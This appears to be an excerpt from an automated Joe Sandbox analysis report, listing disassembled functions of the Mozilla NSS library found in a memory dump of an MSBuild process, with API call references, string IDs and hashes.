                                                                                        • Opcode Fuzzy Hash: 0677f02b4d46544a7e9c66a53fc205cb1f7909015445529619c8e005f5e42c2f
                                                                                        • Instruction Fuzzy Hash: C651B632501106EFDB00DF54DE4CF9A7B76EB4A35DF044025F5087BA22DB309A29CBAA
                                                                                        Function 6C6E4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C50
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C5B
                                                                                        • PR_smprintf.NSS3(6C7BAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C76
                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4CAE
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CC9
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CF4
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4D0B
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D5E
                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D68
                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6E4D85
                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6E4DA2
                                                                                        • free.MOZGLUE(?), ref: 6C6E4DB9
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E4DCF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                        • API String ID: 3756394533-2552752316
                                                                                        • Opcode ID: f77e206c6a8e50d3ce21e69af11e0e4ed98c6da3b6ce5b7d8855eeeea9a4cfb8
                                                                                        • Instruction ID: 68cfbea4882f93c2c216189d793949e413a2d9349d163b9dc8bf101f498fe321
                                                                                        • Opcode Fuzzy Hash: f77e206c6a8e50d3ce21e69af11e0e4ed98c6da3b6ce5b7d8855eeeea9a4cfb8
                                                                                        • Instruction Fuzzy Hash: 6E41BDB190518567DB119FB49C44ABB3AB5AF8A30CF184136EC161BB01EB71E924C7DB
                                                                                        Function 6C6C6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C6C6943
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C6C6957
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C6C6972
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C6C6983
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6C69AA
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6C69BE
                                                                                          • Part of subcall function 6C6C6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6C69D2
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6C69DF
                                                                                          • Part of subcall function 6C6C6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C6C6A5B
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6D8C
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6DC5
                                                                                        • free.MOZGLUE(?), ref: 6C6C6DD6
                                                                                        • free.MOZGLUE(?), ref: 6C6C6DE7
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6C6E1F
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E4B
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6E72
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EA7
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EC4
                                                                                        • free.MOZGLUE(?), ref: 6C6C6ED5
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6EE3
                                                                                        • free.MOZGLUE(?), ref: 6C6C6EF4
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F08
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6F35
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F44
                                                                                        • free.MOZGLUE(?), ref: 6C6C6F5B
                                                                                        • free.MOZGLUE(00000000), ref: 6C6C6F65
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6C781D,00000000,6C6BBE2C,?,6C6C6B1D,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C40
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6C781D,?,6C6BBE2C,?), ref: 6C6C6C58
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6C781D), ref: 6C6C6C6F
                                                                                          • Part of subcall function 6C6C6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6C6C84
                                                                                          • Part of subcall function 6C6C6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6C6C96
                                                                                          • Part of subcall function 6C6C6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6C6CAA
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6F90
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6C6FC5
                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C6C6FF4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                        • String ID: +`ml
                                                                                        • API String ID: 1304971872-2331444378
                                                                                        • Opcode ID: 7edb76baf985e000a87bd55be9f97aeb3ce9067c2598fe0e51849d7c25b61df6
                                                                                        • Instruction ID: c9fda0881f377f5cab40cdfadffc32a892601cd0fe8e47d56bebef9d33cd7bd0
                                                                                        • Opcode Fuzzy Hash: 7edb76baf985e000a87bd55be9f97aeb3ce9067c2598fe0e51849d7c25b61df6
                                                                                        • Instruction Fuzzy Hash: C4B16CB4F052199BDF00DBA9D844BAEBBB9FF49349F140025E815E7601E731E905CBAE
                                                                                        Function 6C6E0550 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 182stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C6C5989), ref: 6C6E0571
                                                                                          • Part of subcall function 6C671240: TlsGetValue.KERNEL32(00000040,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671267
                                                                                          • Part of subcall function 6C671240: EnterCriticalSection.KERNEL32(?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C67127C
                                                                                          • Part of subcall function 6C671240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C671291
                                                                                          • Part of subcall function 6C671240: PR_Unlock.NSS3(?,?,?,?,6C67116C,NSPR_LOG_MODULES), ref: 6C6712A0
                                                                                        • PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C6C5989), ref: 6C6E05B7
                                                                                        • PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05C8
                                                                                        • strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E05EC
                                                                                        • strstr.VCRUNTIME140(00000001,?), ref: 6C6E0653
                                                                                        • free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0681
                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06AB
                                                                                        • PL_NewHashTable.NSS3(00000000,6C6DFE80,?,6C72C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E06D5
                                                                                        • PL_NewHashTable.NSS3(00000000,?,6C72C350,6C72C350,00000000,00000000), ref: 6C6E06EC
                                                                                        • PL_HashTableAdd.NSS3(?,6C7AE618,6C7AE618), ref: 6C6E070F
                                                                                          • Part of subcall function 6C602DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C602E35
                                                                                        • PL_HashTableAdd.NSS3(FFFFFFFF,6C7AE618), ref: 6C6E0738
                                                                                        • PL_HashTableAdd.NSS3(6C7AE634,6C7AE634), ref: 6C6E0752
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C6C5989), ref: 6C6E0767
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
                                                                                        • String ID: 4zl$NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags$$~l
                                                                                        • API String ID: 514890423-3720180156
                                                                                        • Opcode ID: ea686a5078626dcd30812e666df79cd4a456ea7867e726299513cf7de7bd0784
                                                                                        • Instruction ID: b79d538d0e7ef3546c453f81b963cc002b764190d8ccf6fa2f6f6140c43d28c4
                                                                                        • Opcode Fuzzy Hash: ea686a5078626dcd30812e666df79cd4a456ea7867e726299513cf7de7bd0784
                                                                                        • Instruction Fuzzy Hash: 8D5108B2E0A2865FEB408B659D087573BB4AB4F358F180536D818D7B81FB30D905DBA9
                                                                                        Function 6C6BE640 Relevance: 34.8, APIs: 23, Instructions: 266memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,6C6C8C5B,-00000001), ref: 6C6BE655
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • PK11_GetIVLength.NSS3(-00000001,?,?,6C6C8C5B,-00000001), ref: 6C6BE7DE
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE7F4
                                                                                        • PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE807
                                                                                        • PK11_GetIVLength.NSS3(-00000001,?,?,6C6C8C5B,-00000001), ref: 6C6BE81B
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE82E
                                                                                        • PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE841
                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE852
                                                                                        • PORT_Alloc_Util.NSS3(00000004,?,?,6C6C8C5B,-00000001), ref: 6C6BE878
                                                                                        • free.MOZGLUE(00000000,?,?,6C6C8C5B,-00000001), ref: 6C6BE8AB
                                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE8B6
                                                                                        • PORT_Alloc_Util.NSS3(00000008,?,?,?,?,6C6C8C5B,-00000001), ref: 6C6BE8D4
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6BE9D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Alloc_$K11_$GenerateLengthRandomfree$Item_ValueZfreemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1964932494-0
                                                                                        • Opcode ID: 4fd18468feefd3c89d3d662f5df1fb9231cf0c4ef0303d2485a62eefd721190d
                                                                                        • Instruction ID: d195d400d068d8d618c23b942c91a3f68107fae8c058c0974d2974f01b600c98
                                                                                        • Opcode Fuzzy Hash: 4fd18468feefd3c89d3d662f5df1fb9231cf0c4ef0303d2485a62eefd721190d
                                                                                        • Instruction Fuzzy Hash: DF81D5B4941A054BFB50AB689C817AB32E8AB0534CF2080B6D919E6E40FB35D568C7DE
                                                                                        Function 6C6C2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C6C2DEC
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C6C2E00
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E2B
                                                                                        • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6C2E43
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000,?), ref: 6C6C2E74
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C694F1C,?,-00000001,00000000), ref: 6C6C2E88
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EC6
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EE4
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C6C2EF8
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2F62
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C2F86
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2F9E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2FCA
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C301A
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C302E
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C3066
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C3085
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C30EC
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C310C
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C3124
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C314C
                                                                                          • Part of subcall function 6C6A9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A918D
                                                                                          • Part of subcall function 6C6A9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C6D379E,?,6C6A9568,00000000,?,6C6D379E,?,00000001,?), ref: 6C6A91A0
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C316D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                        • String ID:
                                                                                        • API String ID: 3383223490-0
                                                                                        • Opcode ID: 84d62c13892abde21f2c93f0ed17f13e0e288c9a37e9ae826223d5e014b13236
                                                                                        • Instruction ID: 4dbdaa40bafe85fd409733101bfaf79c06853322a71336ab1acde8aa447152d1
                                                                                        • Opcode Fuzzy Hash: 84d62c13892abde21f2c93f0ed17f13e0e288c9a37e9ae826223d5e014b13236
                                                                                        • Instruction Fuzzy Hash: 97F18DB1E006089FDF00DF68D889ADABBB5FF09318F144169EC04A7711EB31E995CB96
                                                                                        Function 6C6C25D0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 284COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C264E
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?), ref: 6C6C2670
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?), ref: 6C6C2684
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26C2
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C6C26E0
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C6C26F4
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C274D
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C28A9
                                                                                          • Part of subcall function 6C6D3440: PK11_GetAllTokens.NSS3 ref: 6C6D3481
                                                                                          • Part of subcall function 6C6D3440: PR_SetError.NSS3(00000000,00000000), ref: 6C6D34A3
                                                                                          • Part of subcall function 6C6D3440: TlsGetValue.KERNEL32 ref: 6C6D352E
                                                                                          • Part of subcall function 6C6D3440: EnterCriticalSection.KERNEL32(?), ref: 6C6D3542
                                                                                          • Part of subcall function 6C6D3440: PR_Unlock.NSS3(?), ref: 6C6D355B
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C27A1
                                                                                        • PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C69662E,?,?,?), ref: 6C6C27B5
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C27CE
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C27E8
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2800
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C6CF854
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C6CF868
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C6CF882
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(04C483FF,?,?), ref: 6C6CF889
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C6CF8A4
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C6CF8AB
                                                                                          • Part of subcall function 6C6CF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C6CF8C9
                                                                                          • Part of subcall function 6C6CF820: free.MOZGLUE(280F10EC,?,?), ref: 6C6CF8D0
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C2834
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C284E
                                                                                        • EnterCriticalSection.KERNEL32(0000001C), ref: 6C6C2866
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
                                                                                        • String ID: .fil$.fil
                                                                                        • API String ID: 544520609-325794162
                                                                                        • Opcode ID: 022a70df9fb1b9a865d23a40146609930c9f605eb926692a6ebfa51c613ec008
                                                                                        • Instruction ID: 0c56abfedbc0ea26ed6b0dbf387c3b2f537663344efbe087a4557d0a53286a99
                                                                                        • Opcode Fuzzy Hash: 022a70df9fb1b9a865d23a40146609930c9f605eb926692a6ebfa51c613ec008
                                                                                        • Instruction Fuzzy Hash: 6FB1E4B1A00605DFDB00DF68D888A9AB7B4FF09308F505539ED05A7B01EB31E955CBA6
                                                                                        Function 6C6B6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_Digest), ref: 6C6B6D86
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6DB4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6DC3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6DD9
                                                                                        • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C6B6DFA
